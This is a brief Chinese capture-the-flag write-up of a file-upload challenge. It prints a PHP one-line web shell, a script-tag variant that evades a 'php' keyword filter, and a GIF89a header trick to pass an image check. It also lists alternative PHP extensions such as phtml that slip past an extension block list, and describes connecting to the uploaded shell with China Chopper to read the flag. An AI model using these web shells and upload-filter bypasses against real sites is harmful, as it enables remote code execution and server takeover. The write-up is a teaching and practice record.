知识点
- js绕过
- GIF89a文件头
编写一句话木马上传
<?php
@eval($_POST[cmd]);
?>
发现php被过滤
使用js脚本绕过
<script language = 'php'>@eval($_POST[cmd]);</script>
发现需要图片
使用文件头绕过
更改后缀名,多次尝试,发现phtml未被过滤
php别名
php3,php4,php5,pht,phtml,phps
上传成功
菜刀连接upload/c2.phtml,在根目录下找到flag